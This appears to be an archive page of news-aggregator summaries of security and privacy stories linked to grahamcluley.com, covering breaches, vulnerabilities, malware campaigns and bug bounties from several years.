Domain: grahamcluley.com
Stories and comments across the archive that link to grahamcluley.com.
Stories · 16
-
SuperProf Private Tutor Site Fails Password Test, Makes Accounts Super Easy To Hack (grahamcluley.com)
Superprof, which claims to be "the world's largest tutoring network," has made its newest members' passwords utterly predictable... leaving them wide open to hackers. From a report: SuperProf is a website that helps you find a private tutor -- either online via webcam, or face-to-face. The site claims to have over three million tutors on its books, helping people learn languages, how to play musical instruments, or giving kids extra lessons in tricky subjects. It's not the only site which offers these kind of services. For instance, SuperProf has just taken over UK-based The Tutor Pages, and -- to the surprise of many Tutor Pages teachers -- migrated them to SuperProf. And, sadly, that account migration has been utterly incompetent from the security point of view.
In an email that SuperProf sent Tutor Pages teachers last night, it shared details of how they can login to their new SuperProf account. If a tutor's name is Barbara, her new SuperProf-provided password is "superbarbara". Clarinetist Lisa's new SuperProf-supplied password is "superlisa." -
'Text Bomb' Is Latest Apple Bug (bbc.com)
An anonymous reader quotes a report from the BBC: A new "text bomb" affecting Apple's iPhone and Mac computers has been discovered. Abraham Masri, a software developer, tweeted about the flaw which typically causes an iPhone to crash and in some cases restart. Simply sending a message containing a link which pointed to Mr Masri's code on programming site GitHub would be enough to activate the bug -- even if the recipient did not click the link itself. Mr Masri said he "always reports bugs" before releasing them. Apple has not yet commented on the issue. On a Mac, the bug reportedly makes the Safari browser crash, and causes other slowdowns. Security expert Graham Cluley wrote on his blog that the bug does not present anything to be particularly worried about -- it's merely very annoying. After the link did the rounds on social media, Mr Masri removed the code from GitHub, therefore disabling the "attack" unless someone was to replicate the code elsewhere. -
It Took a Massachusetts Hospital 14 Years To Detect a Data Breach (grahamcluley.com)
An anonymous reader shares a report: To make matters worse, even after all that time -- it wasn't the medical center itself that discovered the incident. Tewksbury Hospital learned of the breach in the spring of 2017. It hasn't found any evidence to suggest the security incident resulted in attackers misusing patients data. Even so, it believes the event compromised the security of affected individuals' personal and medical information. As the state-run institution explains in a statement: "In April of this year, a former patient expressed concern that someone may have accessed their electronic medical record inappropriately. A review conducted in response to this complaint revealed that one hospital employee appeared to have accessed the former patient's records without a good reason to do so. This discovery led to a broader review of the employee's use of the electronic medical records system at Tewksbury Hospital. As a result of this review, we were able to determine that the employee appeared to have inappropriately accessed the records of a number of current and former Tewksbury Hospital patients." -
Yahoo Patents Smart Billboard That Would Deliver Targeted Ads To Passersby or Motorists (thestack.com)
An anonymous reader writes: Yahoo has filed a patent for advertising billboards outfitted with a wide array of sensors -- including drone-based cameras -- which would use facial and vehicle recognition, data brokers, cell-tower information and social network information to attempt to identify worthwhile advertising targets and aim personalized ads at them as they pass on foot or in cars. The scheme, which was submitted on October 6th, anticipates using the same kind of micro-auction processes that currently determine which ads users see in webpages and mobile apps. The implementation of public ad-targeting brings up some fascinating and chilling prospects, as users find that the ads which "bloom" around them betray much about their private lives. Yahoo provides an example via its patent application: "According to one example, a digital billboard adjacent a busy freeway might be instrumented with or located near traffic sensors that detect information about the context of the vehicles approaching the billboard, e.g., the number and average speed of the vehicles. Such information might be used in conjunction with information about the time of day and/or the day of the week (e.g., Monday morning rush hour) to select advertisements for display that would appeal to an expected demographic and to display the advertisements for durations that are commensurate with the level of traffic congestion." The patent application also mentions how it will gather required information from individuals: "Various types of data (e.g., cell tower data, mobile app location data, image data, etc.) can be used to identify specific individuals in an audience in position to view advertising content. Similarly, vehicle navigation/tracking data from vehicles equipped with such systems could be used to identify specific vehicles and/or vehicle owners. Demographic data (e.g., as obtained from a marketing or user database) for the audience can thus be determined for the purpose of, for example, determining whether and/or the degree to which the demographic profile of the audience corresponds to a target demographic." -
Hackers Seed Torrent Trackers With Malware Disguised as Popular Downloads (grahamcluley.com)
An anonymous reader writes: Cybercriminals are spreading malware via torrent distribution networks, using an automated tool to disguise the downloads as trending audio, video and other digital content in an attempt to infect more unsuspecting victims. Researchers at InfoArmor say they have uncovered a malicious torrent distribution network that relies on a tool called RAUM to infect computers with malware. The network begins with a torrent parser, which collects information about some of the most popular torrent files circulating around the web. Computer criminals then apply their RAUM tool to create a series of malicious files. Some are fake copies of those popular torrent files that in reality hide notorious malware such as CryptXXX, Cerber, or Dridex. Others are weaponized torrent files, while others still are parsed torrent files that rely on a high download rating, a reputation which the attackers artificially inflate by abusing compromised users' accounts to set up new seeds. -
LastPass Accounts Can Be 'Completely Compromised' When Users Visit Sites (theregister.co.uk)
Reader mask.of.sanity writes: A dangerous zero-day vulnerability has been found in popular cloud password vault LastPass, which can completely compromise user accounts when users visit malicious websites. The flaw is today being reported to LastPass by established Google Project zero hacker Tavis Ormandy who says he has found other "obvious critical problems". Interestingly, Mathias Karlsson, a security researcher has also independently found flaws in LastPass. In a blog post, he wrote that he was able to trick LastPass into believing he was on the real Twiter website and cough up the users' credentials of a bug in the LastPass password manager's autofill functionality. LastPass has fixed the bug, but Karlsson advises users to disable autofill functionality and use multi-factor authentication. At this point, it's not clear whether Ormandy is also talking about the same vulnerability. -
Online Backup Firm Carbonite Tells Users To Change Their Passwords Now (grahamcluley.com)
Security reporter Graham Cluley writes:Online backup company Carbonite is the latest firm to have issued a warning that hackers are attempting to break into its users accounts, and are prompting all users to change their passwords as a result. An email has been sent to Carbonite users explaining that the attackers are thought to be using passwords gleaned from other recent mega-breaches. "Based on our security reviews, there is no evidence to suggest that Carbonite has been hacked or compromised," the email reads. "To ensure the protection of all our customers and the safety of their data, we are requiring all Carbonite customers to reset their login information."Instructions to assist you with changing your password is here. -
Telegram Bug Allows Attackers To Crash Devices, Jack Up Phone Bills (grahamcluley.com)
An anonymous reader writes: Researchers have uncovered a vulnerability in Telegram, a popular instant messaging client with over 100M active monthly active users, that attackers could exploit to crash unsuspecting users' devices and jack up their mobile phone bills. To prevent malicious users from abusing the app, Telegram limits text messages to a specific range of characters -- each message must consist of at least one character, and it may not exceed 4,096 characters. But according to Iranian security researchers Sadegh Ahmadzadegan and Omid Ghaffarinia, those limitations can easily be circumvented. The two researchers note in a blog post that a programming error allows a sender to successfully transmit a message with arbitrary length to a receiver. That large file can, in turn, cause the phone to crash or stop working due to a lack of memory. It can also eat up a user's monthly data allotment if they are connected to their mobile network and not Wi-Fi.Telegram is yet to acknowledge the vulnerability, let alone provide a fix for it. -
Ashley Madison Blackmail Letter Revealed (grahamcluley.com)
An anonymous reader writes: Security researcher Graham Cluley says he has been forwarded a blackmail letter, sent to a member of the controversial Ashley Madison adultery website. In the letter the blackmailer says that unless $2,000 worth of bitcoin is paid within 10 days, the recipient's wife, friends and colleagues will be informed of his misdemeanors. In a threatening twist, the letter goes on to give personal details of another victim who refused to pay the blackmailers, and how his personal life and work were targeted as a result. Cluley's advice to recipients is not to pay the blackmailers, but to tell the U.S. Postal Inspectors Service. -
Hackers Publish Cheating Site's Stolen Data
pdclarry notes that many news outlets are reporting that 9.7 GB of data stolen from cheating website AshleyMadison.com has been published online. "The dump contains files with titles including 'aminno_member_dump.gz,' 'aminno_member_email.dump.gz,' 'CreditCardTransactions7z,' and 'member_details.dump.gz,' an indication that the download could contain highly personal details." Brian Krebs questioned the way this has been reported without confirmation, but added that he's been contacted by several people who found their own accurate details within the data dump. Many of the reports note this detail: "Assuming the download turns out to be authentic, people should remember that it was possible for anyone to create an account using the name and e-mail address of other individuals." -
BMW Patches Security Flaw Affecting Over 2 Million Vehicles
An anonymous reader writes BMW has fixed a security bug which left 2.2 million cars, including models from Rolls Royce and Mini, exposed to hackers. The flaw was discovered in vehicles using BMW's ConnectedDrive software, which runs from an installed on-board Sim card. Via the smartphone app, owners can remotely control a number of functions including door locks, air conditioning and sounding the horn. Researchers from the German motorist association ADAC identified the flaw which allowed the system to connect to fake mobile phone networks, enabling hackers to remotely control the Sim card. -
Dropbox and Box Leaked Shared Private Files Through Google
judgecorp writes: "People using shared storage providers such as Box and Dropbox are leaking data, a competitor has discovered. Links to shared files leak out when those links are accidentally put into the Google search box, or if users click links from within the documents. Dropbox competitor Intralinks stumbled across mortgage applications and bank statements while checking Google Analytics data for a Google Adwords campaign. Graham Cluley explains the problem in detail and suggests answers: for Dropbox users, it means upgrading to the Business version, which lets you restrict access to shared document links." Dropbox has posted an official response and disabled access to previously shared links. Box made a vague statement about their awareness of the issue. -
Facebook Being Sued Over Mining of Private Messages
Kimomaru writes "Two Facebook users are trying to start a class action lawsuit against Facebook for allegedly mining information from private messages with the intention of selling is to advertisers (full complaint PDF). It's not the first time a social medial player has been in the press over privacy or security issues. But when the services are provided free of charge, does the user have a realistic expectation of privacy or security, especially when it's understood that the user's data is being mined for advertising? If not, should social media networks be allowed to use words like 'private' (as in private messaging) or 'security' to describe their services?" -
Want To Hijack a Domain? Just Get a Fax Machine
msm1267 writes "Metasploit's HD Moore says hackers sent a spoofed DNS change request via fax to Register.com that the registrar accepted, leading to a DNS hijacking attack against the Metasploit and Rapid7 websites. The two respective homepages were defaced with a message left by the same hacker collective that claimed responsibility for a similar DNS attack against Network Solutions. Rapid7 said the two sites' DNS records have been locked down and they are investigating." -
Security Researchers Rewarded With $12.50 Voucher To Buy Yahoo T-Shirt
Hugh Pickens DOT Com writes "More and more companies are offering Bug Bounty Programs remunerating security researchers for reporting vulnerabilities and weaknesses in their applications and software. Now Security analyst Graham Cluley writes that researchers at High-Tech Bridge informed Yahoo's Security Team about three cross-site scripting (XSS) vulnerabilities affecting the ecom.yahoo.com and adserver.yahoo.com domains. According to High-Tech Bridge, each of the vulnerabilities could compromise *any* @yahoo.com email account. All that was required was that the victim, while logged into Yahoo, should click on a specially-crafted link received in an email. Forty-eight hours later, Yahoo had patched all of the vulnerabilities and Yahoo's security team responded, thanking the researchers and 'offering the mighty bounty of err.. $12.50 per vulnerability,' writes Cluley. But there was one catch. The $12.50 was given as a discount code that can only be used in the Yahoo Company Store, which sells Yahoo's corporate t-shirts, cups, pens and other accessories." -
VOIP Provider Viber Attacked By Syrian Electronic Army
An anonymous reader writes "The hacking group known as the Syrian Electronic Army have hacked into Viber, defacing its support website, and posting what they claim is evidence of surveillance by the free phone-messaging app. The Syrian Electronic Army posted a message claiming the 'Israeli-based Viber is spying and tracking you' alongside what appeared to be a screenshot of an internal Viber database containing users' phone numbers, device UDIDs, IP address, operating system, and Viber version information." Viber is saying the attack was minor: "...the hack only allowed access to two minor systems, a customer support panel and a support administration system. According to the company's official response, 'no sensitive user data was exposed and Viber's databases were not "hacked."' Apparently, an employee simply fell victim to a phishing attack.